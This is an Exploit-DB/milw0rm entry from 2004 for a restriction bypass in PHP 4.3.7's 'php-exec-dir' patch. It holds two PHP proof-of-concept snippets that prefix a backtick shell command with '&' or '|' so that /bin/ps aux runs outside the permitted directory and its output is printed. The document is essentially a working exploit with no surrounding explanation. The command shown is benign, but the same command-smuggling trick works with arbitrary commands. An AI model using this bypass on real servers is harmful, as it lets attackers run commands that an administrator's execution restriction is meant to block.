PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass

EDB-ID:

384


Author:

VeNoMouS

Type:

webapps


Platform:

PHP

Date:

2004-08-08


<?php 
$blah = `& /bin/ps aux`; 
echo nl2br($blah); 
?> 

<?php 
$blah = `| /bin/ps aux`; 
echo nl2br($blah); 
?> 


# milw0rm.com [2004-08-08]